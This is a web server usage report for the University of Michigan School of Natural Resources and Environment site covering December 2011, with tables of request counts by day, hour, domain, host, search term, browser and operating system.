Web Server Statistics for School of Natural Resources and Environment - cssProgram started at Tue-03-Jan-2012 15:55.
Analysed requests from Thu-01-Dec-2011 00:00 to Sat-31-Dec-2011 23:57 (31.00 days).
(Go To: Top | General Summary | Weekly Report | Daily Report | Daily Summary | Hourly Summary | Domain Report | Organisation Report | Host Report | Referrer Report | Search Word Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Request Report)
This report contains overall statistics.
Successful requests: 201,440
Average successful requests per day: 6,498
Successful requests for pages: 8,414
Average successful requests for pages per day: 271
Failed requests: 15,044
Redirected requests: 638
Distinct files requested: 10,761
Distinct hosts served: 15,649
Corrupt logfile lines: 288
Data transferred: 45.91 gigabytes
Average data transferred per day: 1.48 gigabytes
(Go To: Top | General Summary | Weekly Report | Daily Report | Daily Summary | Hourly Summary | Domain Report | Organisation Report | Host Report | Referrer Report | Search Word Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Request Report)
This report lists the activity in each week.
Each unit (
) represents 150 requests for pages or part thereof.
| week beg. | reqs | Gbytes | %bytes | %reqs | pages | |
|---|---|---|---|---|---|---|
| 27/Nov/11 | 21950 | 2.79 | 6.07% | 10.90% | 1078 | ![]() |
| 4/Dec/11 | 58610 | 17.64 | 38.43% | 29.10% | 2024 | ![]() ![]() ![]() |
| 11/Dec/11 | 47938 | 8.19 | 17.84% | 23.80% | 2018 | ![]() ![]() ![]() |
| 18/Dec/11 | 40422 | 9.45 | 20.59% | 20.07% | 1608 | ![]() ![]() ![]() |
| 25/Dec/11 | 32520 | 7.84 | 17.07% | 16.14% | 1686 | ![]() ![]() |
Busiest week: week beginning 4/Dec/11 (2,024 requests for pages).
(Go To: Top | General Summary | Weekly Report | Daily Report | Daily Summary | Hourly Summary | Domain Report | Organisation Report | Host Report | Referrer Report | Search Word Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Request Report)
This report lists the activity in each day.
Each unit (
) represents 30 requests for pages or part thereof.
| date | reqs | Gbytes | %bytes | %reqs | pages | |
|---|---|---|---|---|---|---|
| 1/Dec/11 | 9951 | 1.18 | 2.57% | 4.94% | 418 | ![]() ![]() ![]() |
| 2/Dec/11 | 7609 | 0.88 | 1.91% | 3.78% | 398 | ![]() ![]() ![]() |
| 3/Dec/11 | 4390 | 0.73 | 1.59% | 2.18% | 262 | ![]() ![]() |
| 4/Dec/11 | 6339 | 1.06 | 2.31% | 3.15% | 255 | ![]() ![]() |
| 5/Dec/11 | 8587 | 1.26 | 2.73% | 4.26% | 368 | ![]() ![]() ![]() |
| 6/Dec/11 | 9407 | 2.11 | 4.59% | 4.67% | 298 | ![]() ![]() |
| 7/Dec/11 | 8884 | 1.33 | 2.90% | 4.41% | 345 | ![]() ![]() |
| 8/Dec/11 | 6438 | 1.30 | 2.84% | 3.20% | 259 | ![]() ![]() |
| 9/Dec/11 | 14048 | 9.63 | 20.97% | 6.97% | 292 | ![]() ![]() |
| 10/Dec/11 | 4907 | 0.95 | 2.08% | 2.44% | 207 | ![]() ![]() ![]() |
| 11/Dec/11 | 5530 | 0.88 | 1.91% | 2.75% | 214 | ![]() |
| 12/Dec/11 | 7341 | 1.54 | 3.36% | 3.64% | 327 | ![]() ![]() ![]() |
| 13/Dec/11 | 13339 | 1.65 | 3.60% | 6.62% | 310 | ![]() ![]() ![]() |
| 14/Dec/11 | 6117 | 1.20 | 2.62% | 3.04% | 279 | ![]() ![]() |
| 15/Dec/11 | 6542 | 1.28 | 2.78% | 3.25% | 273 | ![]() ![]() |
| 16/Dec/11 | 4589 | 0.91 | 1.99% | 2.28% | 265 | ![]() ![]() |
| 17/Dec/11 | 4480 | 0.72 | 1.57% | 2.22% | 350 | ![]() ![]() |
| 18/Dec/11 | 3901 | 0.92 | 2.01% | 1.94% | 224 | ![]() |
| 19/Dec/11 | 5879 | 2.52 | 5.49% | 2.92% | 234 | ![]() |
| 20/Dec/11 | 5957 | 1.19 | 2.58% | 2.96% | 306 | ![]() ![]() ![]() |
| 21/Dec/11 | 9452 | 1.99 | 4.33% | 4.69% | 234 | ![]() |
| 22/Dec/11 | 5715 | 0.87 | 1.91% | 2.84% | 218 | ![]() |
| 23/Dec/11 | 5244 | 1.15 | 2.50% | 2.60% | 215 | ![]() |
| 24/Dec/11 | 4274 | 0.81 | 1.77% | 2.12% | 177 | ![]() ![]() |
| 25/Dec/11 | 3799 | 1.07 | 2.33% | 1.89% | 184 | ![]() ![]() ![]() |
| 26/Dec/11 | 4285 | 1.35 | 2.94% | 2.13% | 251 | ![]() ![]() |
| 27/Dec/11 | 5443 | 1.08 | 2.35% | 2.70% | 195 | ![]() ![]() ![]() |
| 28/Dec/11 | 6771 | 1.59 | 3.47% | 3.36% | 261 | ![]() ![]() |
| 29/Dec/11 | 4341 | 0.95 | 2.07% | 2.15% | 226 | ![]() |
| 30/Dec/11 | 4484 | 0.94 | 2.05% | 2.23% | 206 | ![]() ![]() ![]() |
| 31/Dec/11 | 3397 | 0.85 | 1.86% | 1.69% | 363 | ![]() ![]() ![]() |
Busiest day: 1/Dec/11 (418 requests for pages).
(Go To: Top | General Summary | Weekly Report | Daily Report | Daily Summary | Hourly Summary | Domain Report | Organisation Report | Host Report | Referrer Report | Search Word Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Request Report)
This report lists the total activity for each day of the week, summed over all the weeks in the report.
Each unit (
) represents 80 requests for pages or part thereof.
| day | reqs | Gbytes | %bytes | %reqs | pages | |
|---|---|---|---|---|---|---|
| Sun | 19569 | 3.93 | 8.55% | 9.71% | 877 | ![]() ![]() ![]() |
| Mon | 26092 | 6.67 | 14.52% | 12.95% | 1180 | ![]() ![]() ![]() ![]() |
| Tue | 34146 | 6.03 | 13.13% | 16.95% | 1109 | ![]() ![]() ![]() |
| Wed | 31224 | 6.12 | 13.33% | 15.50% | 1119 | ![]() ![]() ![]() |
| Thu | 32987 | 5.58 | 12.16% | 16.38% | 1394 | ![]() ![]() |
| Fri | 35974 | 13.51 | 29.43% | 17.86% | 1376 | ![]() ![]() |
| Sat | 21448 | 4.08 | 8.88% | 10.65% | 1359 | ![]() ![]() |
(Go To: Top | General Summary | Weekly Report | Daily Report | Daily Summary | Hourly Summary | Domain Report | Organisation Report | Host Report | Referrer Report | Search Word Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Request Report)
This report lists the total activity for each hour of the day, summed over all the days in the report.
Each unit (
) represents 40 requests for pages or part thereof.
| hour | reqs | Gbytes | %bytes | %reqs | pages | |
|---|---|---|---|---|---|---|
| 0 | 5246 | 1.64 | 3.57% | 2.60% | 256 | ![]() ![]() ![]() |
| 1 | 5415 | 2.52 | 5.49% | 2.69% | 238 | ![]() ![]() |
| 2 | 4525 | 1.12 | 2.44% | 2.25% | 264 | ![]() ![]() ![]() |
| 3 | 18921 | 2.43 | 5.30% | 9.39% | 747 | ![]() ![]() ![]() |
| 4 | 15346 | 1.83 | 3.99% | 7.62% | 589 | ![]() ![]() ![]() ![]() |
| 5 | 8349 | 1.78 | 3.87% | 4.14% | 289 | ![]() |
| 6 | 7557 | 1.30 | 2.84% | 3.75% | 295 | ![]() |
| 7 | 7190 | 1.35 | 2.93% | 3.57% | 260 | ![]() ![]() ![]() |
| 8 | 6932 | 1.53 | 3.33% | 3.44% | 290 | ![]() |
| 9 | 7562 | 1.52 | 3.31% | 3.75% | 405 | ![]() ![]() ![]() |
| 10 | 15553 | 1.91 | 4.15% | 7.72% | 428 | ![]() ![]() ![]() |
| 11 | 9104 | 1.59 | 3.46% | 4.52% | 365 | ![]() ![]() |
| 12 | 9601 | 1.58 | 3.44% | 4.77% | 357 | ![]() ![]() |
| 13 | 11757 | 6.13 | 13.35% | 5.84% | 327 | ![]() ![]() |
| 14 | 11648 | 6.76 | 14.73% | 5.78% | 360 | ![]() ![]() |
| 15 | 8255 | 1.55 | 3.37% | 4.10% | 418 | ![]() ![]() ![]() |
| 16 | 7923 | 1.42 | 3.10% | 3.93% | 412 | ![]() ![]() ![]() |
| 17 | 6903 | 1.27 | 2.76% | 3.43% | 310 | ![]() |
| 18 | 5469 | 0.92 | 2.01% | 2.71% | 281 | ![]() |
| 19 | 5419 | 0.99 | 2.16% | 2.69% | 347 | ![]() ![]() |
| 20 | 5428 | 1.43 | 3.11% | 2.69% | 292 | ![]() |
| 21 | 5016 | 1.23 | 2.69% | 2.49% | 281 | ![]() |
| 22 | 6170 | 1.08 | 2.34% | 3.06% | 260 | ![]() ![]() ![]() |
| 23 | 6151 | 1.04 | 2.27% | 3.05% | 343 | ![]() ![]() |
(Go To: Top | General Summary | Weekly Report | Daily Report | Daily Summary | Hourly Summary | Domain Report | Organisation Report | Host Report | Referrer Report | Search Word Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Request Report)
This report lists the countries of the computers which requested files.
Listing domains with at least 0.5% of the traffic, sorted by the amount of traffic.
| reqs | Gbytes | %bytes | %reqs | pages | domain |
|---|---|---|---|---|---|
| 75001 | 22.91 | 49.91% | 37.23% | 2846 | [unresolved numerical addresses] |
| 46881 | 7.50 | 16.34% | 23.27% | 2668 | .com (Commercial) |
| 30287 | 4.76 | 10.37% | 15.04% | 874 | .net (Networks) |
| 15849 | 2.55 | 5.56% | 7.87% | 289 | .edu (US Higher Education) |
| 10673 | 0.57 | 1.24% | 5.30% | 150 | umich.edu (University of Michigan) |
| 8347 | 0.47 | 1.03% | 4.14% | 105 | snre.umich.edu |
| 2741 | 1.33 | 2.91% | 1.36% | 379 | .ru (Russia) |
| 7328 | 1.27 | 2.77% | 3.64% | 173 | .in (India) |
| 1943 | 0.78 | 1.70% | 0.96% | 286 | .uk (United Kingdom) |
| 520 | 0.74 | 1.61% | 0.26% | 1 | .be (Belgium) |
| 317 | 0.46 | 0.99% | 0.16% | 35 | .tv (Tuvalu) |
| 1790 | 0.36 | 0.79% | 0.89% | 68 | .de (Germany) |
| 817 | 0.28 | 0.62% | 0.41% | 53 | .org (Non Profit Making Organizations) |
| 17966 | 2.95 | 6.43% | 8.92% | 742 | [not listed: 117 domains] |
(Go To: Top | General Summary | Weekly Report | Daily Report | Daily Summary | Hourly Summary | Domain Report | Organisation Report | Host Report | Referrer Report | Search Word Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Request Report)
This report lists the organisations of the computers which requested files.
Listing the top 20 organisations by the number of requests, sorted by the number of requests.
| reqs | %bytes | organisation |
|---|---|---|
| 17353 | 3.31% | googlebot.com |
| 10673 | 1.24% | umich.edu |
| 6865 | 2.38% | comcast.net |
| 6861 | 0.64% | 216.161 |
| 6778 | 18.37% | 204.237 |
| 5835 | 2.06% | 117 |
| 4452 | 2.74% | msn.com |
| 3700 | 4.10% | baidu.com |
| 3392 | 0.36% | myhostcenter.com |
| 3082 | 0.32% | 180.76 |
| 3038 | 0.72% | sbcglobal.net |
| 2827 | 2.17% | 38 |
| 2821 | 0.79% | verizon.net |
| 2243 | 2.71% | yandex.ru |
| 1892 | 0.76% | rr.com |
| 1833 | 0.07% | 210.25 |
| 1765 | 1.13% | 41 |
| 1713 | 0.43% | cox.net |
| 1636 | 0.69% | 115 |
| 1597 | 0.07% | 212.113 |
| 111084 | 54.94% | [not listed: 3,667 organisations] |
(Go To: Top | General Summary | Weekly Report | Daily Report | Daily Summary | Hourly Summary | Domain Report | Organisation Report | Host Report | Referrer Report | Search Word Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Request Report)
This report lists the computers which requested files.
Listing the top 50 hosts by the number of requests, sorted by the number of requests.
| reqs | Gbytes | %bytes | %reqs | host |
|---|---|---|---|---|
| 16574 | 1.44 | 3.15% | 8.23% | crawl-66-249-71-109.googlebot.com |
| 6778 | 8.43 | 18.37% | 3.36% | 204.237.122.14 |
| 6112 | 0.19 | 0.42% | 3.03% | snre-do-merrillk.snre.umich.edu |
| 5997 | 0.26 | 0.57% | 2.98% | 216.161.176.188 |
| 3392 | 0.16 | 0.36% | 1.68% | s7.n200.n222.n216.static.myhostcenter.com |
| 2693 | 0.94 | 2.05% | 1.34% | 38.101.148.126 |
| 2120 | 1.22 | 2.65% | 1.05% | spider83.yandex.ru |
| 1659 | 0.03 | 0.06% | 0.82% | 210.25.133.28 |
| 1597 | 0.03 | 0.07% | 0.79% | 212.113.37.105 |
| 1269 | 0.03 | 0.06% | 0.63% | 74.198.87.51 |
| 1041 | 0.25 | 0.54% | 0.52% | hunscher2.snre.umich.edu |
| 864 | 0.03 | 0.07% | 0.43% | 216.161.176.113 |
| 836 | 0.04 | 0.09% | 0.42% | 19-68-73-109.rackcentre.redstation.net.uk |
| 649 | 0.02 | 0.03% | 0.32% | iradiovm03.eng.ad.ucalgary.ca |
| 633 | 0.84 | 1.83% | 0.31% | 85.31.219.55 |
| 621 | 0.01 | 0.03% | 0.31% | mancos.de |
| 621 | 0.01 | 0.02% | 0.31% | 7.174.249.62.customer.cdi.no |
| 616 | 0.10 | 0.21% | 0.31% | 193.219.64.35 |
| 615 | 0.02 | 0.04% | 0.31% | 84-235-15-97.static.saudi.net.sa |
| 603 | 0.01 | 0.02% | 0.30% | n177-p168.kthopen.kth.se |
| 569 | 0.02 | 0.05% | 0.28% | 203.75.23.95.dynamic.jazztel.es |
| 527 | 0.07 | 0.14% | 0.26% | 2.220.202.1.static.bjtelecom.net |
| 502 | 0.01 | 0.02% | 0.25% | 173.192.34.95-static.reverse.softlayer.com |
| 463 | 0.07 | 0.16% | 0.23% | 175.143.236.195 |
| 459 | 0.06 | 0.12% | 0.23% | crawl-66-249-67-13.googlebot.com |
| 441 | 0.09 | 0.20% | 0.22% | h-251-18.scoutjet.com |
| 426 | 0.02 | 0.04% | 0.21% | 64.22.106.82 |
| 418 | 0.62 | 1.34% | 0.21% | 85.31.219.20 |
| 411 | 0.01 | 0.01% | 0.20% | adsl-99-97-250-197.dsl.sfldmi.sbcglobal.net |
| 411 | 0.01 | 0.03% | 0.20% | pool-71-176-56-219.nrflva.east.verizon.net |
| 409 | 0.02 | 0.04% | 0.20% | 67-194-17-197.wireless.umnet.umich.edu |
| 398 | 0.01 | 0.03% | 0.20% | 78.177.105.240 |
| 393 | 0.01 | 0.03% | 0.20% | s01060011d8376d50.vf.shawcable.net |
| 388 | 0.03 | 0.07% | 0.19% | server.dualrack.com |
| 355 | 0.01 | 0.02% | 0.18% | static-88.131.106.22.addr.tdc.se |
| 348 | 0.16 | 0.34% | 0.17% | 58.147.168.5 |
| 303 | 0.92 | 2.00% | 0.15% | 221.10.55.140 |
| 301 | 0.01 | 0.02% | 0.15% | dcwinpc34.dc.umich.edu |
| 300 | 0.00 | 0.15% | n165s156.ntc.blacksburg.shentel.net | |
| 296 | 0.09 | 0.19% | 0.15% | crawl03.exabot.com |
| 295 | 0.46 | 0.99% | 0.15% | nat.nexstar.tv |
| 294 | 0.01 | 0.02% | 0.15% | 5-72.tr.cgocable.ca |
| 294 | 0.02 | 0.04% | 0.15% | crawl-66-249-71-116.googlebot.com |
| 290 | 0.02 | 0.04% | 0.14% | c-98-248-193-13.hsd1.ca.comcast.net |
| 284 | 0.01 | 0.03% | 0.14% | nat125.usc.es |
| 283 | 0.00 | 0.01% | 0.14% | dhcp-206-244.snre.umich.edu |
| 272 | 0.01 | 0.01% | 0.14% | dhcp-206-245.snre.umich.edu |
| 272 | 0.01 | 0.01% | 0.14% | snre-cs-simapro.snre.umich.edu |
| 266 | 0.01 | 0.02% | 0.13% | 117.200.72.14 |
| 243 | 0.01 | 0.03% | 0.12% | 121.1.54.50 |
| 135239 | 29.06 | 63.31% | 67.14% | [not listed: 15,599 hosts] |
(Go To: Top | General Summary | Weekly Report | Daily Report | Daily Summary | Hourly Summary | Domain Report | Organisation Report | Host Report | Referrer Report | Search Word Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Request Report)
This report lists the referrers (where people followed links from, or pages which included this site's images).
Listing the top 25 referring URLs by the number of requests, sorted by the number of requests.
(Go To: Top | General Summary | Weekly Report | Daily Report | Daily Summary | Hourly Summary | Domain Report | Organisation Report | Host Report | Referrer Report | Search Word Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Request Report)
This report lists which words people used in search engines to find the site.
Listing the top 30 query words by the number of requests, sorted by the number of requests.
| reqs | search term |
|---|---|
| 21684 | and |
| 6849 | online |
| 6814 | aveda |
| 6810 | products |
| 6779 | sale |
| 6778 | ontario |
| 6234 | ppt |
| 3621 | pollution |
| 3028 | of |
| 2655 | energy |
| 1939 | on |
| 1783 | environmental |
| 1226 | environment |
| 1217 | water |
| 1200 | in |
| 1054 | the |
| 824 | for |
| 759 | |
| 759 | system |
| 736 | download |
| 721 | resources |
| 719 | renewable |
| 647 | life |
| 640 | waste |
| 638 | sources |
| 589 | to |
| 575 | us |
| 571 | pollution.ppt |
| 549 | air |
| 545 | cycle |
| 46927 | [not listed: 4,900 search terms] |
(Go To: Top | General Summary | Weekly Report | Daily Report | Daily Summary | Hourly Summary | Domain Report | Organisation Report | Host Report | Referrer Report | Search Word Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Request Report)
This report lists the browsers used by visitors.
Listing the top 40 browsers by the number of requests for pages, sorted by the number of requests for pages.
| reqs | Gbytes | %bytes | %reqs | browser |
|---|---|---|---|---|
| 4371 | 0.73 | 1.59% | 2.19% | Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html) |
| 5097 | 0.21 | 0.46% | 2.55% | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) |
| 347 | 0.06 | 0.12% | 0.17% | Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729) |
| 332 | 0.00 | 0.17% | Microsoft Office Protocol Discovery | |
| 2234 | 1.24 | 2.71% | 1.12% | Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots) |
| 16678 | 0.68 | 1.49% | 8.36% | Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) |
| 2080 | 0.18 | 0.40% | 1.04% | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) |
| 234 | 0.08 | 0.17% | 0.12% | Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; ) |
| 244 | 0.06 | 0.12% | 0.12% | Zend_Http_Client |
| 240 | 0.05 | 0.12% | 0.12% | Microsoft Data Access Internet Publishing Provider Protocol Discovery |
| 194 | 0.06 | 0.14% | 0.10% | Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en-US; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 |
| 174 | 0.03 | 0.07% | 0.09% | Sosospider+(+http://help.soso.com/webspider.htm) |
| 4248 | 0.94 | 2.06% | 2.13% | Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) |
| 7138 | 0.70 | 1.53% | 3.58% | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0 |
| 3115 | 0.54 | 1.18% | 1.56% | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0.1) Gecko/20100101 Firefox/8.0.1 |
| 4218 | 0.89 | 1.95% | 2.11% | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.121 Safari/535.2 |
| 2069 | 0.04 | 0.08% | 1.04% | Mozilla/5.0 (compatible; MJ12bot/v1.4.0; http://www.majestic12.co.uk/bot.php?+) |
| 702 | 0.02 | 0.04% | 0.35% | Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/) |
| 3784 | 0.70 | 1.52% | 1.90% | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.121 Safari/535.2 |
| 477 | 0.07 | 0.15% | 0.24% | Mozilla/5.0 (compatible; JikeSpider; +http://shoulu.jike.com/spider.html) |
| 198 | 0.49 | 1.07% | 0.10% | Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.11) Gecko/20101012 Firefox/3.6.11 |
| 89 | 0.00 | 0.01% | 0.04% | Jakarta Commons-HttpClient/3.1 |
| 310 | 0.02 | 0.04% | 0.16% | Mozilla/5.0 (compatible; Ezooms/1.0; ezooms.bot@gmail.com) |
| 2522 | 0.50 | 1.10% | 1.26% | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7 |
| 3615 | 0.77 | 1.68% | 1.81% | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7 |
| 5319 | 0.43 | 0.95% | 2.66% | Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) |
| 2511 | 1.95 | 4.26% | 1.26% | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7 |
| 130 | 0.01 | 0.03% | 0.07% | Microsoft-WebDAV-MiniRedir/6.1.7600 |
| 3542 | 0.58 | 1.26% | 1.77% | Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0 |
| 3139 | 0.68 | 1.49% | 1.57% | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.121 Safari/535.2 |
| 1597 | 0.03 | 0.07% | 0.80% | Mozilla/5.0 (compatible; AhrefsBot/1.0; +http://ahrefs.com/robot/) |
| 1570 | 0.40 | 0.88% | 0.79% | Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) |
| 330 | 0.02 | 0.05% | 0.17% | Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.16) Gecko |
| 140 | 0.01 | 0.02% | 0.07% | Microsoft-WebDAV-MiniRedir/6.1.7601 |
| 37 | 0.00 | 0.02% | Mozilla/4.0 (compatible; MS FrontPage 12.0) | |
| 296 | 0.09 | 0.19% | 0.15% | Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot) |
| 372 | 0.02 | 0.04% | 0.19% | Mozilla/5.0 (compatible; MJ12bot/v1.4.1; http://www.majestic12.co.uk/bot.php?+) |
| 35 | 0.00 | 0.02% | ht://check/1.2.3 (not recognized system) | |
| 57 | 0.01 | 0.02% | 0.03% | Microsoft-WebDAV-MiniRedir/6.0.6002 |
| 173 | 0.15 | 0.32% | 0.09% | Mozilla/4.0 (compatible; ICS) |
| 115656 | 32.28 | 70.60% | 57.94% | [not listed: 4,632 browsers] |
(Go To: Top | General Summary | Weekly Report | Daily Report | Daily Summary | Hourly Summary | Domain Report | Organisation Report | Host Report | Referrer Report | Search Word Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Request Report)
This report lists the vendors of visitors' browsers.
Listing the top 20 browsers by the number of requests for pages, sorted by the number of requests for pages.
| reqs | Gbytes | %bytes | %reqs | browser |
|---|---|---|---|---|
| 37014 | 5.29 | 11.57% | 18.54% | Netscape (compatible) |
| 62750 | 9.43 | 20.61% | 31.44% | MSIE |
| 14182 | 2.88 | 6.31% | 7.10% | MSIE/7 |
| 7091 | 1.39 | 3.04% | 3.55% | MSIE/6 |
| 30323 | 3.67 | 8.04% | 15.19% | MSIE/8 |
| 9894 | 1.26 | 2.76% | 4.96% | MSIE/9 |
| 1020 | 0.19 | 0.41% | 0.51% | MSIE/5 |
| 41 | 0.01 | 0.01% | 0.02% | MSIE/4 |
| 27 | 0.01 | 0.02% | 0.01% | MSIE/2 |
| 158 | 0.01 | 0.02% | 0.08% | MSIE/999 |
| 44375 | 15.30 | 33.47% | 22.23% | Firefox |
| 16825 | 10.72 | 23.45% | 8.43% | Firefox/3 |
| 20850 | 3.15 | 6.88% | 10.45% | Firefox/8 |
| 1544 | 0.24 | 0.53% | 0.77% | Firefox/7 |
| 1355 | 0.26 | 0.56% | 0.68% | Firefox/4 |
| 1487 | 0.37 | 0.81% | 0.74% | Firefox/6 |
| 1369 | 0.30 | 0.66% | 0.69% | Firefox/5 |
| 702 | 0.19 | 0.41% | 0.35% | Firefox/9 |
| 25 | 0.00 | 0.01% | Firefox/ANantes-151-1-162-1 | |
| 21 | 0.02 | 0.04% | 0.01% | Firefox/ANantes-151-1-162-6 |
| 62 | 0.00 | 0.01% | 0.03% | Firefox/ANantes-151-1-162-11 |
| 38764 | 9.80 | 21.43% | 19.42% | Safari |
| 27523 | 6.89 | 15.07% | 13.79% | Safari/535 |
| 5988 | 1.66 | 3.64% | 3.00% | Safari/534 |
| 2198 | 0.43 | 0.94% | 1.10% | Safari/533 |
| 474 | 0.10 | 0.23% | 0.24% | Safari/7534 |
| 320 | 0.09 | 0.19% | 0.16% | Safari/6533 |
| 258 | 0.08 | 0.18% | 0.13% | Safari/532 |
| 137 | 0.04 | 0.08% | 0.07% | Safari/531 |
| 326 | 0.34 | 0.75% | 0.16% | Safari/6531 |
| 136 | 0.03 | 0.08% | 0.07% | Safari/530 |
| 100 | 0.03 | 0.06% | 0.05% | Safari/525 |
| 332 | 0.00 | 0.17% | Microsoft Office Protocol Discovery | |
| 375 | 0.05 | 0.11% | 0.19% | Microsoft-WebDAV-MiniRedir |
| 343 | 0.04 | 0.09% | 0.17% | Microsoft-WebDAV-MiniRedir/6 |
| 32 | 0.01 | 0.03% | 0.02% | Microsoft-WebDAV-MiniRedir/5 |
| 244 | 0.06 | 0.12% | 0.12% | Zend_Http_Client |
| 1410 | 0.47 | 1.03% | 0.71% | Mozilla |
| 68 | 0.03 | 0.07% | 0.03% | Mozilla/1 |
| 240 | 0.05 | 0.12% | 0.12% | Microsoft Data Access Internet Publishing Provider Protocol Discovery |
| 174 | 0.03 | 0.07% | 0.09% | Sosospider+(+http: |
| 174 | 0.03 | 0.07% | 0.09% | Sosospider+(+http://help |
| 1504 | 0.42 | 0.91% | 0.75% | Opera |
| 1031 | 0.35 | 0.77% | 0.52% | Opera/9 |
| 184 | 0.03 | 0.06% | 0.09% | Opera/7 |
| 186 | 0.03 | 0.07% | 0.09% | Opera/8 |
| 63 | 0.01 | 0.02% | 0.03% | Opera/6 |
| 89 | 0.00 | 0.01% | 0.04% | Jakarta Commons-HttpClient |
| 89 | 0.00 | 0.01% | 0.04% | Jakarta Commons-HttpClient/3 |
| 141 | 0.09 | 0.20% | 0.07% | Netscape |
| 90 | 0.03 | 0.06% | 0.05% | Netscape/4 |
| 42 | 0.07 | 0.15% | 0.02% | Netscape/0 |
| 5 | 0.00 | Netscape/6 | ||
| 35 | 0.00 | 0.02% | ht: | |
| 35 | 0.00 | 0.02% | ht://check/1 | |
| 295 | 0.46 | 1.00% | 0.15% | Aghaven |
| 295 | 0.46 | 1.00% | 0.15% | Aghaven/Nutch-1 |
| 1977 | 0.04 | 0.08% | 0.99% | larbin_2.6.3 larbin2.6.3@unspecified.mail |
| 620 | 0.02 | 0.05% | 0.31% | Gigabot |
| 620 | 0.02 | 0.05% | 0.31% | Gigabot/3 |
| 147 | 0.08 | 0.17% | 0.07% | Googlebot |
| 147 | 0.08 | 0.17% | 0.07% | Googlebot/2 |
| 25 | 0.01 | 0.01% | 0.01% | Dillo |
| 25 | 0.01 | 0.01% | 0.01% | Dillo/0 |
| 92 | 0.05 | 0.10% | 0.05% | Java |
| 92 | 0.05 | 0.10% | 0.05% | Java/1 |
| 9011 | 4.08 | 8.93% | 4.51% | [not listed: 179 browsers] |
(Go To: Top | General Summary | Weekly Report | Daily Report | Daily Summary | Hourly Summary | Domain Report | Organisation Report | Host Report | Referrer Report | Search Word Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Request Report)
This report lists the operating systems used by visitors.
Listing operating systems, sorted by the number of requests for pages.
| no. | reqs | pages | OS |
|---|---|---|---|
| 1 | 133828 | 3653 | Windows |
| 52060 | 1639 | Windows XP | |
| 72719 | 1235 | Unknown Windows | |
| 7348 | 528 | Windows Server 2003 | |
| 446 | 111 | Windows 2000 | |
| 186 | 61 | Windows 98 | |
| 776 | 41 | Windows NT | |
| 106 | 17 | Windows ME | |
| 146 | 16 | Windows 95 | |
| 29 | 5 | Windows 3.1 | |
| 12 | 0 | Windows CE | |
| 2 | 38956 | 2144 | OS unknown |
| 3 | 12759 | 2130 | Known robots |
| 4 | 12278 | 357 | Macintosh |
| 5 | 1782 | 77 | Unix |
| 1734 | 77 | Linux | |
| 37 | 0 | Other Unix | |
| 11 | 0 | SunOS | |
| 6 | 11 | 0 | Symbian OS |
(Go To: Top | General Summary | Weekly Report | Daily Report | Daily Summary | Hourly Summary | Domain Report | Organisation Report | Host Report | Referrer Report | Search Word Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Request Report)
This report lists the HTTP status codes of all requests.
Listing status codes, sorted numerically.
| reqs | status code |
|---|---|
| 139651 | 200 OK |
| 58219 | 206 Partial content |
| 146 | 301 Document moved permanently |
| 492 | 302 Document found elsewhere |
